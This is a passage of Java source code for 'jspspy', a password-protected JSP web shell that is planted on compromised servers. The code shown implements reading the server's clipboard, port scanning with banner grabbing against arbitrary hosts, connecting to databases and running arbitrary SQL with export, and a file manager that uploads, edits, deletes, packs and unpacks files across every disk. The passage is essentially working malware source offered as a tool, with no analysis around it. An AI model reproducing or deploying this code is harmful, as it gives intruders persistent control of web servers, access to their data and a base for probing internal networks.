1097. + " <h2>System Clipboard &raquo;</h2>"
1098. + "<p><pre>");
1099. try {
1100. out.println(Util.htmlEncode(Util.getStr(Toolkit
1101. .getDefaultToolkit().getSystemClipboard()
1102. .getContents(DataFlavor.stringFlavor)
1103. .getTransferData(DataFlavor.stringFlavor))));
1104. } catch (Exception ex) {
1105. out.println("ClipBoard is Empty Or Is Not Text Data !");
1106. }
1107. out
1108. .println("</pre>"
1109. + " <input class=\"bt\" name=\"button\" id=\"button\" onClick=\"history.back()\" value=\"Back\" type=\"button\" size=\"100\" />"
1110. + " </p>" + " </td>" + " </tr>"
1111. + "</table>");
1112. } catch (Exception e) {
1113.  
1114. throw e;
1115. }
1116. }
1117. }
1118.  
1119. private static class VPortScanInvoker extends DefaultInvoker {
1120. public void invoke(HttpServletRequest request,
1121. HttpServletResponse response, HttpSession JSession)
1122. throws Exception {
1123. try {
1124. PrintWriter out = response.getWriter();
1125. String ip = request.getParameter("ip");
1126. String ports = request.getParameter("ports");
1127. String timeout = request.getParameter("timeout");
1128. String banner = request.getParameter("banner");
1129. if (Util.isEmpty(ip))
1130. ip = "127.0.0.1";
1131. if (Util.isEmpty(ports))
1132. ports = "21,25,80,110,1433,1723,3306,3389,4899,5631,43958,65500";
1133. if (Util.isEmpty(timeout))
1134. timeout = "2";
1135. out
1136. .println("<table width=\"100%\" border=\"0\" cellpadding=\"15\" cellspacing=\"0\"><tr><td>"
1137. + "<h2 id=\"Bin_H2_Title\">PortScan &gt;&gt;</h2>"
1138. + "<div id=\"YwLB\"><form action=\""
1139. + SHELL_NAME
1140. + "\" method=\"post\">"
1141. + "<p><input type=\"hidden\" value=\"portScan\" name=\"o\">"
1142. + "IP : <input name=\"ip\" type=\"text\" value=\""
1143. + ip
1144. + "\" id=\"ip\" class=\"input\" style=\"width:10%;margin:0 8px;\" /> Port : <input name=\"ports\" type=\"text\" value=\""
1145. + ports
1146. + "\" id=\"ports\" class=\"input\" style=\"width:40%;margin:0 8px;\" /> <input "
1147. + (!Util.isEmpty(banner) ? "checked" : "")
1148. + " type='checkbox' value='yes' name='banner'/>Banner Timeout (Second) : <input name=\"timeout\" type=\"text\" value=\""
1149. + timeout
1150. + "\" id=\"timeout\" class=\"input\" size=\"5\" style=\"margin:0 8px;\" /> <input type=\"submit\" name=\"submit\" value=\"Scan\" id=\"submit\" class=\"bt\" />"
1151. + "</p>"
1152. + "</form></div>"
1153. + "</td></tr></table>");
1154. } catch (Exception e) {
1155.  
1156. throw e;
1157. }
1158. }
1159. }
1160.  
1161. private static class PortScanInvoker extends DefaultInvoker {
1162. public void invoke(HttpServletRequest request,
1163. HttpServletResponse response, HttpSession JSession)
1164. throws Exception {
1165. try {
1166. PrintWriter out = response.getWriter();
1167. ((Invoker) ins.get("vPortScan")).invoke(request, response,
1168. JSession);
1169. out.println("<hr/>");
1170. String ip = request.getParameter("ip");
1171. String ports = request.getParameter("ports");
1172. String timeout = request.getParameter("timeout");
1173. String banner = request.getParameter("banner");
1174. int iTimeout = 0;
1175. if (Util.isEmpty(ip) || Util.isEmpty(ports))
1176. return;
1177. if (!Util.isInteger(timeout)) {
1178. timeout = "2";
1179. }
1180. iTimeout = Integer.parseInt(timeout);
1181. Map rs = new LinkedHashMap();
1182. String[] portArr = ports.split(",");
1183. for (int i = 0; i < portArr.length; i++) {
1184. String port = portArr[i];
1185. BufferedReader r = null;
1186. try {
1187. Socket s = new Socket();
1188. s.connect(new InetSocketAddress(ip, Integer
1189. .parseInt(port)), iTimeout);
1190. s.setSoTimeout(iTimeout);
1191. if (!Util.isEmpty(banner)) {
1192. r = new BufferedReader(new InputStreamReader(s
1193. .getInputStream()));
1194. StringBuffer sb = new StringBuffer();
1195. String b = r.readLine();
1196. while (b != null) {
1197. sb.append(b + " ");
1198. try {
1199. b = r.readLine();
1200. } catch (Exception e) {
1201. break;
1202. }
1203. }
1204. rs.put(port,
1205. "Open <span style=\"color:grey;font-weight:normal\">"
1206. + sb.toString() + "</span>");
1207. r.close();
1208. } else {
1209. rs.put(port, "Open");
1210. }
1211. s.close();
1212. } catch (Exception e) {
1213. if (e.toString().toLowerCase()
1214. .indexOf("read timed out") != -1) {
1215. rs
1216. .put(
1217. port,
1218. "Open <span style=\"color:grey;font-weight:normal\">&lt;&lt;No Banner!&gt;&gt;</span>");
1219. if (r != null)
1220. r.close();
1221. } else {
1222. rs.put(port, "Close");
1223. }
1224. }
1225. }
1226. out.println("<div style='margin:10px'>");
1227. Set entrySet = rs.entrySet();
1228. Iterator it = entrySet.iterator();
1229. while (it.hasNext()) {
1230. Map.Entry e = (Map.Entry) it.next();
1231. String port = (String) e.getKey();
1232. String value = (String) e.getValue();
1233. out.println(ip + " : " + port
1234. + " ................................. <font color="
1235. + (value.equals("Close") ? "red" : "green")
1236. + "><b>" + value + "</b></font><br>");
1237. }
1238. out.println("</div>");
1239. } catch (Exception e) {
1240.  
1241. throw e;
1242. }
1243. }
1244. }
1245.  
1246. private static class VConnInvoker extends DefaultInvoker {
1247. public void invoke(HttpServletRequest request,
1248. HttpServletResponse response, HttpSession JSession)
1249. throws Exception {
1250. try {
1251. PrintWriter out = response.getWriter();
1252. Object obj = JSession.getAttribute(DBO);
1253. if (obj == null || !((DBOperator) obj).isValid()) {
1254. out
1255. .println(" <script type=\"text/javascript\">"
1256. + " function changeurldriver(){"
1257. + " var form = document.forms[\"form1\"];"
1258. + " var v = form.elements[\"db\"].value;"
1259. + " form.elements[\"url\"].value = v.split(\"`\")[1];"
1260. + " form.elements[\"driver\"].value = v.split(\"`\")[0];"
1261. + " form.elements[\"selectDb\"].value = form.elements[\"db\"].selectedIndex;"
1262. + " }" + " </script>");
1263. out
1264. .println("<table width=\"100%\" border=\"0\" cellpadding=\"15\" cellspacing=\"0\"><tr><td>"
1265. + "<form name=\"form1\" id=\"form1\" action=\""
1266. + SHELL_NAME
1267. + "\" method=\"post\" >"
1268. + "<input type=\"hidden\" id=\"selectDb\" name=\"selectDb\" value=\"0\">"
1269. + "<h2>DataBase Manager &raquo;</h2>"
1270. + "<input id=\"action\" type=\"hidden\" name=\"o\" value=\"dbc\" />"
1271. + "<p>"
1272. + "Driver:"
1273. + " <input class=\"input\" name=\"driver\" id=\"driver\" type=\"text\" size=\"35\" />"
1274. + "URL:"
1275. + "<input class=\"input\" name=\"url\" id=\"url\" value=\"\" type=\"text\" size=\"90\" />"
1276. + "UID:"
1277. + "<input class=\"input\" name=\"uid\" id=\"uid\" value=\"\" type=\"text\" size=\"10\" />"
1278. + "PWD:"
1279. + "<input class=\"input\" name=\"pwd\" id=\"pwd\" value=\"\" type=\"text\" size=\"10\" />"
1280. + "DataBase:"
1281. + " <select onchange='changeurldriver()' class=\"input\" id=\"db\" name=\"db\" >"
1282. + " <option value='com.mysql.jdbc.Driver`jdbc:mysql://localhost:3306/mysql?useUnicode=true&characterEncoding=GBK'>Mysql</option>"
1283. + " <option value='oracle.jdbc.driver.OracleDriver`jdbc:oracle:thin:@dbhost:1521:ORA1'>Oracle</option>"
1284. + " <option value='com.microsoft.jdbc.sqlserver.SQLServerDriver`jdbc:microsoft:sqlserver://localhost:1433;DatabaseName=master'>Sql Server</option>"
1285. + " <option value='sun.jdbc.odbc.JdbcOdbcDriver`jdbc:odbc:Driver={Microsoft Access Driver (*.mdb)};DBQ=C:\\ninty.mdb'>Access</option>"
1286. + " <option value=' ` '>Other</option>"
1287. + " </select>"
1288. + "<input class=\"bt\" name=\"connect\" id=\"connect\" value=\"Connect\" type=\"submit\" size=\"100\" />"
1289. + "</p>"
1290. + "</form></table><script>changeurldriver()</script>");
1291. } else {
1292. ((Invoker) ins.get("dbc")).invoke(request, response,
1293. JSession);
1294. }
1295. } catch (ClassCastException e) {
1296. throw e;
1297. } catch (Exception e) {
1298.  
1299. throw e;
1300. }
1301. }
1302. }
1303.  
1304. //DBConnect
1305. private static class DbcInvoker extends DefaultInvoker {
1306. public void invoke(HttpServletRequest request,
1307. HttpServletResponse response, HttpSession JSession)
1308. throws Exception {
1309. try {
1310. PrintWriter out = response.getWriter();
1311. String driver = request.getParameter("driver");
1312. String url = request.getParameter("url");
1313. String uid = request.getParameter("uid");
1314. String pwd = request.getParameter("pwd");
1315. String sql = request.getParameter("sql");
1316. String selectDb = request.getParameter("selectDb");
1317. if (selectDb == null)
1318. selectDb = JSession.getAttribute("selectDb").toString();
1319. else
1320. JSession.setAttribute("selectDb", selectDb);
1321. Object dbo = JSession.getAttribute(DBO);
1322. if (dbo == null || !((DBOperator) dbo).isValid()) {
1323. if (dbo != null)
1324. ((DBOperator) dbo).close();
1325. dbo = new DBOperator(driver, url, uid, pwd, true);
1326. } else {
1327. if (!Util.isEmpty(driver) && !Util.isEmpty(url)
1328. && !Util.isEmpty(uid)) {
1329. DBOperator oldDbo = (DBOperator) dbo;
1330. dbo = new DBOperator(driver, url, uid, pwd);
1331. if (!oldDbo.equals(dbo)) {
1332. ((DBOperator) oldDbo).close();
1333. ((DBOperator) dbo).connect();
1334. } else {
1335. dbo = oldDbo;
1336. }
1337. }
1338. }
1339. DBOperator Ddbo = (DBOperator) dbo;
1340. JSession.setAttribute(DBO, Ddbo);
1341. if (!Util.isEmpty(request.getParameter("type"))
1342. && request.getParameter("type").equals("switch")) {
1343. Ddbo.getConn().setCatalog(request.getParameter("catalog"));
1344. }
1345. Util.outMsg(out, "Connect To DataBase Success!");
1346. out
1347. .println(" <script type=\"text/javascript\">"
1348. + " function changeurldriver(selectDb){"
1349. + " var form = document.forms[\"form1\"];"
1350. + " if (selectDb){"
1351. + " form.elements[\"db\"].selectedIndex = selectDb"
1352. + " }"
1353. + " var v = form.elements[\"db\"].value;"
1354. + " form.elements[\"url\"].value = v.split(\"`\")[1];"
1355. + " form.elements[\"driver\"].value = v.split(\"`\")[0];"
1356. + " form.elements[\"selectDb\"].value = form.elements[\"db\"].selectedIndex;"
1357. + " }" + " </script>");
1358. out
1359. .println("<table width=\"100%\" border=\"0\" cellpadding=\"15\" cellspacing=\"0\"><tr><td>"
1360. + "<form name=\"form1\" id=\"form1\" action=\""
1361. + SHELL_NAME
1362. + "\" method=\"post\" >"
1363. + "<input type=\"hidden\" id=\"selectDb\" name=\"selectDb\" value=\""
1364. + selectDb
1365. + "\">"
1366. + "<h2>DataBase Manager &raquo;</h2>"
1367. + "<input id=\"action\" type=\"hidden\" name=\"o\" value=\"dbc\" />"
1368. + "<p>"
1369. + "Driver:"
1370. + " <input class=\"input\" name=\"driver\" value=\""
1371. + Ddbo.driver
1372. + "\" id=\"driver\" type=\"text\" size=\"35\" />"
1373. + "URL:"
1374. + "<input class=\"input\" name=\"url\" value=\""
1375. + Ddbo.url
1376. + "\" id=\"url\" value=\"\" type=\"text\" size=\"90\" />"
1377. + "UID:"
1378. + "<input class=\"input\" name=\"uid\" value=\""
1379. + Ddbo.uid
1380. + "\" id=\"uid\" value=\"\" type=\"text\" size=\"10\" />"
1381. + "PWD:"
1382. + "<input class=\"input\" name=\"pwd\" value=\""
1383. + Ddbo.pwd
1384. + "\" id=\"pwd\" value=\"\" type=\"text\" size=\"10\" />"
1385. + "DataBase:"
1386. + " <select onchange='changeurldriver()' class=\"input\" id=\"db\" name=\"db\" >"
1387. + " <option value='com.mysql.jdbc.Driver`jdbc:mysql://localhost:3306/mysql?useUnicode=true&characterEncoding=GBK'>Mysql</option>"
1388. + " <option value='oracle.jdbc.driver.OracleDriver`jdbc:oracle:thin:@dbhost:1521:ORA1'>Oracle</option>"
1389. + " <option value='com.microsoft.jdbc.sqlserver.SQLServerDriver`jdbc:microsoft:sqlserver://localhost:1433;DatabaseName=master'>Sql Server</option>"
1390. + " <option value='sun.jdbc.odbc.JdbcOdbcDriver`jdbc:odbc:Driver={Microsoft Access Driver (*.mdb)};DBQ=C:/ninty.mdb'>Access</option>"
1391. + " <option value=' ` '>Other</option>"
1392. + " </select>"
1393. + "<input class=\"bt\" name=\"connect\" id=\"connect\" value=\"Connect\" type=\"submit\" size=\"100\" />"
1394. + "</p>"
1395. + "</form><script>changeurldriver('"
1396. + selectDb + "')</script>");
1397. DatabaseMetaData meta = Ddbo.getConn().getMetaData();
1398. out
1399. .println("<form action=\""
1400. + SHELL_NAME
1401. + "\" method=\"POST\">"
1402. + "<p><input type=\"hidden\" name=\"selectDb\" value=\""
1403. + selectDb
1404. + "\"><input type=\"hidden\" name=\"o\" value=\"executesql\"><table width=\"200\" border=\"0\" cellpadding=\"0\" cellspacing=\"0\"><tr><td colspan=\"2\">Version : <b style='color:red;font-size:14px'><i>"
1405. + meta.getDatabaseProductName()
1406. + " , "
1407. + meta.getDatabaseProductVersion()
1408. + "</i></b><br/>URL : <b style='color:red;font-size:14px'><i>"
1409. + meta.getURL()
1410. + "</i></b><br/>Catalog : <b style='color:red;font-size:14px'><i>"
1411. + Ddbo.getConn().getCatalog()
1412. + "</i></b><br/>UserName : <b style='color:red;font-size:14px'><i>"
1413. + meta.getUserName()
1414. + "</i></b><br/><br/></td></tr><tr><td colspan=\"2\">Run SQL query/queries on database / <b><i>Switch Database :</i></b> ");
1415. out
1416. .println("<select id=\"catalogs\" onchange=\"if (this.value == '0') return;doPost({o:'executesql',type:'switch',catalog:document.getElementById('catalogs').value})\">");
1417. out
1418. .println("<option value='0'>-- Select a DataBase --</option>");
1419. ResultSet dbs = meta.getCatalogs();
1420. try {
1421. while (dbs.next()) {
1422. out.println("<option value='" + dbs.getString(1) + "'>"
1423. + dbs.getString(1) + "</option>");
1424. }
1425. } catch (Exception ex) {
1426. }
1427. dbs.close();
1428. out
1429. .println("</select></td></tr><tr><td><textarea id=\"sql\" name=\"sql\" class=\"area\" style=\"width:600px;height:50px;overflow:auto;\">"
1430. + Util.htmlEncode(Util.getStr(sql))
1431. + "</textarea><input class=\"bt\" name=\"submit\" type=\"submit\" value=\"Query\" /> <input class=\"bt\" onclick=\"doPost({o:'export',type:'queryexp',sql:document.getElementById('sql').value})\" type=\"button\" value=\"Export\" /> <input type='button' value='Export To File' class='bt' onclick=\"doPost({o:'vExport',type:'queryexp',sql:document.getElementById('sql').value})\"></td><td nowrap style=\"padding:0 5px;\"></td></tr></table></p></form></table>");
1432. if (Util.isEmpty(sql)) {
1433. String type = request.getParameter("type");
1434. if (Util.isEmpty(type) || type.equals("switch")) {
1435. ResultSet tbs = meta.getTables(null, null, null, null);
1436. out.println(Table.rs2Table(tbs, meta
1437. .getIdentifierQuoteString(), true));
1438. tbs.close();
1439. } else if (type.equals("struct")) {
1440. String tb = request.getParameter("table");
1441. if (Util.isEmpty(tb))
1442. return;
1443. ResultSet t = meta.getColumns(null, null, tb, null);
1444. out.println(Table.rs2Table(t, "", false));
1445. t.close();
1446. }
1447. }
1448. } catch (Exception e) {
1449. JSession
1450. .setAttribute(
1451. MSG,
1452. "<span style='color:red'>Some Error Occurred. Please Check Out the StackTrace Follow.</span>"
1453. + BACK_HREF);
1454. throw e;
1455. }
1456. }
1457. }
1458.  
1459. private static class ExecuteSQLInvoker extends DefaultInvoker {
1460. public void invoke(HttpServletRequest request,
1461. HttpServletResponse response, HttpSession JSession)
1462. throws Exception {
1463. try {
1464. PrintWriter out = response.getWriter();
1465. String sql = request.getParameter("sql");
1466. String db = request.getParameter("selectDb");
1467. Object dbo = JSession.getAttribute(DBO);
1468. if (!Util.isEmpty(sql)) {
1469. if (dbo == null || !((DBOperator) dbo).isValid()) {
1470. ((Invoker) ins.get("vConn")).invoke(request, response,
1471. JSession);
1472. return;
1473. } else {
1474. ((Invoker) ins.get("dbc")).invoke(request, response,
1475. JSession);
1476. Object obj = ((DBOperator) dbo).execute(sql);
1477. if (obj instanceof ResultSet) {
1478. ResultSet rs = (ResultSet) obj;
1479. ResultSetMetaData meta = rs.getMetaData();
1480. int colCount = meta.getColumnCount();
1481. out
1482. .println("<b style=\"margin-left:15px\">Query#0 : "
1483. + Util.htmlEncode(sql)
1484. + "</b><br/><br/>");
1485. out
1486. .println("<table border=\"0\" cellpadding=\"3\" cellspacing=\"0\" style=\"margin-left:15px\"><tr class=\"head\">");
1487. for (int i = 1; i <= colCount; i++) {
1488. out.println("<td nowrap>"
1489. + meta.getColumnName(i) + "<br><span>"
1490. + meta.getColumnTypeName(i)
1491. + "</span></td>");
1492. }
1493. out.println("</tr>");
1494. Table tb = new Table();
1495. while (rs.next()) {
1496. Row r = new Row();
1497. for (int i = 1; i <= colCount; i++) {
1498. String v = null;
1499. try {
1500. v = rs.getString(i);
1501. } catch (SQLException ex) {
1502. v = "<<Error!>>";
1503. }
1504. r.addColumn(new Column(v));
1505. }
1506. tb.addRow(r);
1507. }
1508. out.println(tb.toString());
1509. out.println("</table><br/>");
1510. rs.close();
1511. ((DBOperator) dbo).closeStmt();
1512. } else {
1513. out
1514. .println("<b style='margin-left:15px'>affected rows : <i>"
1515. + obj + "</i></b><br/><br/>");
1516. }
1517. }
1518. } else {
1519. ((Invoker) ins.get("dbc")).invoke(request, response,
1520. JSession);
1521. }
1522. } catch (Exception e) {
1523.  
1524. throw e;
1525. }
1526. }
1527. }
1528.  
1529. private static class VLoginInvoker extends DefaultInvoker {
1530. public boolean doBefore() {
1531. return false;
1532. }
1533.  
1534. public void invoke(HttpServletRequest request,
1535. HttpServletResponse response, HttpSession JSession)
1536. throws Exception {
1537. try {
1538. PrintWriter out = response.getWriter();
1539. out
1540. .println("<html><head><title>jspspy</title><style type=\"text/css\">"
1541. + " input {font:11px Verdana;BACKGROUND: #FFFFFF;height: 18px;border: 1px solid #666666;}"
1542. + "a{font:11px Verdana;BACKGROUND: #FFFFFF;}"
1543. + " </style></head><body><form method=\"POST\" action=\""
1544. + SHELL_NAME
1545. + "\">"
1546. + "<!--<p style=\"font:11px Verdana;color:red\">Private Edition Dont Share It !</p>-->"
1547. + " <p><span style=\"font:11px Verdana;\">Password: </span>"
1548. + " <input name=\"o\" type=\"hidden\" value=\"login\">"
1549. + " <input name=\"pw\" type=\"password\" size=\"20\">"
1550. + " <input type=\"hidden\" name=\"o\" value=\"login\">"
1551. + " <input type=\"submit\" value=\"Login\"><br/>"
1552. + "<!--<span style=\"font:11px Verdana;\">Copyright &copy; 2010</span>--></p>"
1553. + " </form><span style='font-weight:bold;color:red;font-size:12px'></span></body></html>");
1554. } catch (Exception e) {
1555.  
1556. throw e;
1557. }
1558. }
1559. }
1560.  
1561. private static class LoginInvoker extends DefaultInvoker {
1562. public boolean doBefore() {
1563. return false;
1564. }
1565.  
1566. public void invoke(HttpServletRequest request,
1567. HttpServletResponse response, HttpSession JSession)
1568. throws Exception {
1569. try {
1570. String inputPw = request.getParameter("pw");
1571. if (Util.isEmpty(inputPw) || !inputPw.equals(PW)) {
1572. ((Invoker) ins.get("vLogin")).invoke(request, response,
1573. JSession);
1574. return;
1575. } else {
1576. JSession.setAttribute(PW_SESSION_ATTRIBUTE, inputPw);
1577. response.sendRedirect(SHELL_NAME);
1578. return;
1579. }
1580. } catch (Exception e) {
1581.  
1582. throw e;
1583. }
1584. }
1585. }
1586.  
1587. private static class MyComparator implements Comparator {
1588. public int compare(Object obj1, Object obj2) {
1589. try {
1590. if (obj1 != null && obj2 != null) {
1591. File f1 = (File) obj1;
1592. File f2 = (File) obj2;
1593. if (f1.isDirectory()) {
1594. if (f2.isDirectory()) {
1595. return f1.getName().compareTo(f2.getName());
1596. } else {
1597. return -1;
1598. }
1599. } else {
1600. if (f2.isDirectory()) {
1601. return 1;
1602. } else {
1603. return f1.getName().toLowerCase().compareTo(
1604. f2.getName().toLowerCase());
1605. }
1606. }
1607. }
1608. return 0;
1609. } catch (Exception e) {
1610. return 0;
1611. }
1612. }
1613. }
1614.  
1615. private static class FileListInvoker extends DefaultInvoker {
1616. public void invoke(HttpServletRequest request,
1617. HttpServletResponse response, HttpSession JSession)
1618. throws Exception {
1619. try {
1620. String path2View = null;
1621. PrintWriter out = response.getWriter();
1622. String path = request.getParameter("folder");
1623. String outEntry = request.getParameter("outentry");
1624. if (!Util.isEmpty(outEntry) && outEntry.equals("true")) {
1625. JSession.removeAttribute(ENTER);
1626. JSession.removeAttribute(ENTER_MSG);
1627. JSession.removeAttribute(ENTER_CURRENT_DIR);
1628. }
1629. Object enter = JSession.getAttribute(ENTER);
1630. File file = null;
1631. if (!Util.isEmpty(enter)) {
1632. if (Util.isEmpty(path)) {
1633. if (JSession.getAttribute(ENTER_CURRENT_DIR) == null)
1634. path = "/";
1635. else
1636. path = (String) (JSession
1637. .getAttribute(ENTER_CURRENT_DIR));
1638. }
1639. file = new EnterFile(path);
1640. ((EnterFile) file).setZf((String) enter);
1641. JSession.setAttribute(ENTER_CURRENT_DIR, path);
1642. } else {
1643. if (Util.isEmpty(path))
1644. path = JSession.getAttribute(CURRENT_DIR).toString();
1645. JSession.setAttribute(CURRENT_DIR, Util.convertPath(path));
1646. file = new File(path);
1647. }
1648. path2View = Util.convertPath(path);
1649. if (!file.exists()) {
1650. throw new Exception(path + "Dont Exists !");
1651. }
1652. File[] list = file.listFiles();
1653. Arrays.sort(list, new MyComparator());
1654. out.println("<div style='margin:10px'>");
1655. String cr = null;
1656. try {
1657. cr = JSession.getAttribute(CURRENT_DIR).toString()
1658. .substring(0, 3);
1659. } catch (Exception e) {
1660. cr = "/";
1661. }
1662. File currentRoot = new File(cr);
1663. out.println("<h2>File Manager - Current disk &quot;"
1664. + (cr.indexOf("/") == 0 ? "/" : currentRoot.getPath())
1665. + "&quot; total (unknow)</h2>");
1666. out
1667. .println("<form action=\""
1668. + SHELL_NAME
1669. + "\" method=\"post\">"
1670. + "<table width=\"98%\" border=\"0\" cellpadding=\"0\" cellspacing=\"0\" style=\"margin:10px 0;\">"
1671. + " <tr>"
1672. + " <td nowrap>Current Directory <input type=\"hidden\" name=\"o\" value=\"filelist\"/></td>"
1673. + " <td width=\"98%\"><input class=\"input\" name=\"folder\" value=\""
1674. + path2View
1675. + "\" type=\"text\" style=\"width:100%;margin:0 8px;\"></td>"
1676. + " <td nowrap><input class=\"bt\" value=\"GO\" type=\"submit\"></td>"
1677. + " </tr>" + "</table>" + "</form>");
1678. out
1679. .println("<table width=\"98%\" border=\"0\" cellpadding=\"4\" cellspacing=\"0\">"
1680. + "<form action=\""
1681. + SHELL_NAME
1682. + "?o=upload\" method=\"POST\" enctype=\"multipart/form-data\"><tr class=\"alt1\"><td colspan=\"7\" style=\"padding:5px;\">"
1683. + "<div style=\"float:right;\"><input class=\"input\" name=\"file\" value=\"\" type=\"file\" /> <input class=\"bt\" name=\"doupfile\" value=\"Upload\" "
1684. + (enter == null ? "type=\"submit\""
1685. : "type=\"button\" onclick=\"alert('You Are In File Now ! Can Not Upload !')\"")
1686. + " /></div>"
1687. + "<a href=\"javascript:new fso({path:'"
1688. + Util.convertPath(WEB_ROOT)
1689. + "'}).subdir('true')\">Web Root</a>"
1690. + " | <a href=\"javascript:new fso({path:'"
1691. + Util.convertPath(SHELL_DIR)
1692. + "'}).subdir('true')\">Shell Directory</a>"
1693. + " | <a href=\"javascript:"
1694. + (enter == null ? "new fso({}).mkdir()"
1695. : "alert('You Are In File Now ! Can Not Create Directory ! ')")
1696. + "\">New Directory</a> | <a href=\"javascript:"
1697. + (enter == null ? "new fso({}).createFile()"
1698. : "alert('You Are In File Now ! Can Not Create File !')")
1699. + "\">New File</a>" + " | ");
1700. File[] roots = file.listRoots();
1701. for (int i = 0; i < roots.length; i++) {
1702. File r = roots[i];
1703. out.println("<a href=\"javascript:new fso({path:'"
1704. + Util.convertPath(r.getPath())
1705. + "'}).subdir('true');\">Disk("
1706. + Util.convertPath(r.getPath()) + ")</a>");
1707. if (i != roots.length - 1) {
1708. out.println("|");
1709. }
1710. }
1711. out.println("</td>" + "</tr></form>"
1712. + "<tr class=\"head\"><td>&nbsp;</td>"
1713. + " <td>Name</td>"
1714. + " <td width=\"16%\">Last Modified</td>"
1715. + " <td width=\"10%\">Size</td>"
1716. + " <td width=\"20%\">Read/Write/Execute</td>"
1717. + " <td width=\"22%\">&nbsp;</td>" + "</tr>");
1718. if (file.getParent() != null) {
1719. out
1720. .println("<tr class=alt1>"
1721. + "<td align=\"center\"><font face=\"Wingdings 3\" size=4>=</font></td>"
1722. + "<td nowrap colspan=\"5\"><a href=\"javascript:new fso({path:'"
1723. + Util.convertPath(file.getAbsolutePath())
1724. + "'}).parent()\">Goto Parent</a></td>"
1725. + "</tr>");
1726. }
1727. int dircount = 0;
1728. int filecount = 0;
1729. for (int i = 0; i < list.length; i++) {
1730. File f = list[i];
1731. if (f.isDirectory()) {
1732. dircount++;
1733. out
1734. .println("<tr class=\"alt2\" onMouseOver=\"this.className='focus';\" onMouseOut=\"this.className='alt2';\">"
1735. + "<td width=\"2%\" nowrap><font face=\"wingdings\" size=\"3\">0</font></td>"
1736. + "<td><a href=\"javascript:new fso({path:'"
1737. + Util.convertPath(f.getAbsolutePath())
1738. + "'}).subdir()\">"
1739. + f.getName()
1740. + "</a></td>"
1741. + "<td nowrap>"
1742. + Util.formatDate(f.lastModified())
1743. + "</td>"
1744. + "<td nowrap>--</td>"
1745. + "<td nowrap>"
1746. + f.canRead()
1747. + " / "
1748. + f.canWrite()
1749. + " / unknow</td>"
1750. + "<td nowrap>");
1751. if (enter != null)
1752. out.println("&nbsp;");
1753. else
1754. out
1755. .println("<a href=\"javascript:new fso({path:'"
1756. + Util.convertPath(f
1757. .getAbsolutePath())
1758. + "',filename:'"
1759. + f.getName()
1760. + "'}).removedir()\">Del</a> | <a href=\"javascript:new fso({path:'"
1761. + Util.convertPath(f
1762. .getAbsolutePath())
1763. + "'}).move()\">Move</a> | <a href=\"javascript:new fso({path:'"
1764. + Util.convertPath(f
1765. .getAbsolutePath())
1766. + "',filename:'"
1767. + f.getName()
1768. + "'}).pack(true)\">Pack</a>");
1769. out.println("</td></tr>");
1770. } else {
1771. filecount++;
1772. out
1773. .println("<tr class=\"alt1\" onMouseOver=\"this.className='focus';\" onMouseOut=\"this.className='alt1';\">"
1774. + "<td width=\"2%\" nowrap><input type='checkbox' value='"
1775. + f.getName()
1776. + "'/></td>"
1777. + "<td><a href=\"javascript:new fso({path:'"
1778. + Util.convertPath(f.getAbsolutePath())
1779. + "'}).down()\">"
1780. + f.getName()
1781. + "</a></td>"
1782. + "<td nowrap>"
1783. + Util.formatDate(f.lastModified())
1784. + "</td>"
1785. + "<td nowrap>"
1786. + Util.getSize(f.length(), 'B')
1787. + "</td>"
1788. + "<td nowrap>"
1789. + ""
1790. + f.canRead()
1791. + " / "
1792. + f.canWrite()
1793. + " / unknow </td>"
1794. + "<td nowrap>"
1795. + "<a href=\"javascript:new fso({path:'"
1796. + Util.convertPath(f.getAbsolutePath())
1797. + "'}).vEdit()\">Edit</a> | "
1798. + "<a href=\"javascript:new fso({path:'"
1799. + Util.convertPath(f.getAbsolutePath())
1800. + "'}).down()\">Down</a> | "
1801. + "<a href=\"javascript:new fso({path:'"
1802. + Util.convertPath(f.getAbsolutePath())
1803. + "'}).copy()\">Copy</a>");
1804. if (enter == null) {
1805. out
1806. .println(" | <a href=\"javascript:new fso({path:'"
1807. + Util.convertPath(f
1808. .getAbsolutePath())
1809. + "'}).move()\">Move</a> | "
1810. + "<a href=\"javascript:new fso({path:'"
1811. + Util.convertPath(f
1812. .getAbsolutePath())
1813. + "'}).vEditProperty()\">Property</a> | "
1814. + "<a href=\"javascript:new fso({path:'"
1815. + Util.convertPath(f
1816. .getAbsolutePath())
1817. + "'}).enter()\">Enter</a>");
1818. if (f.getName().endsWith(".zip")
1819. || f.getName().endsWith(".jar")) {
1820. out
1821. .println(" | <a href=\"javascript:new fso({path:'"
1822. + Util.convertPath(f
1823. .getAbsolutePath())
1824. + "',filename:'"
1825. + f.getName()
1826. + "'}).unpack()\">UnPack</a>");
1827. } else if (f.getName().endsWith(".rar")) {
1828. out
1829. .println(" | <a href=\"javascript:alert('Dont Support RAR,Please Use WINRAR');\">UnPack</a>");
1830. } else {
1831. out
1832. .println(" | <a href=\"javascript:new fso({path:'"
1833. + Util.convertPath(f
1834. .getAbsolutePath())
1835. + "',filename:'"
1836. + f.getName()
1837. + "'}).pack()\">Pack</a>");
1838. }
1839. }
1840. out.println("</td></tr>");
1841. }
1842. }
1843. out
1844. .println("<tr class=\"alt2\"><td align=\"center\">&nbsp;</td>"
1845. + " <td>");
1846. if (enter != null)
1847. out
1848. .println("<a href=\"javascript:alert('You Are In File Now ! Can Not Pack !');\">Pack Selected</a> - <a href=\"javascript:alert('You Are In File Now ! Can Not Delete !');\">Delete Selected</a>");
1849. else
1850. out
1851. .println("<a href=\"javascript:new fso({}).packBatch();\">Pack Selected</a> - <a href=\"javascript:new fso({}).deleteBatch();\">Delete Selected</a>");
1852. out.println("</td>" + " <td colspan=\"4\" align=\"right\">"
1853. + dircount + " directories / " + filecount
1854. + " files</td></tr>" + "</table>");
1855. out.println("</div>");
1856. if (file instanceof EnterFile)
1857. ((EnterFile) file).close();
1858. } catch (ZipException e) {
1859. JSession.setAttribute(MSG, "\""
1860. + JSession.getAttribute(ENTER).toString()
1861. + "\" Is Not a Zip File. Please Exit.");
1862. throw e;
1863. } catch (Exception e) {
1864. JSession.setAttribute(MSG,
1865. "File Does Not Exist Or You Dont Have Privilege."
1866. + BACK_HREF);
1867. throw e;
1868. }
1869. }
1870. }
1871.  
1872. private static class LogoutInvoker extends DefaultInvoker {
1873. public boolean doBefore() {
1874. return false;
1875. }
1876.  
1877. public boolean doAfter() {
1878. return false;
1879. }
1880.  
1881. public void invoke(HttpServletRequest request,
1882. HttpServletResponse response, HttpSession JSession)
1883. throws Exception {
1884. try {
1885. Object dbo = JSession.getAttribute(DBO);
1886. if (dbo != null)
1887. ((DBOperator) dbo).close();
1888. Object obj = JSession.getAttribute(PORT_MAP);
1889. if (obj != null) {
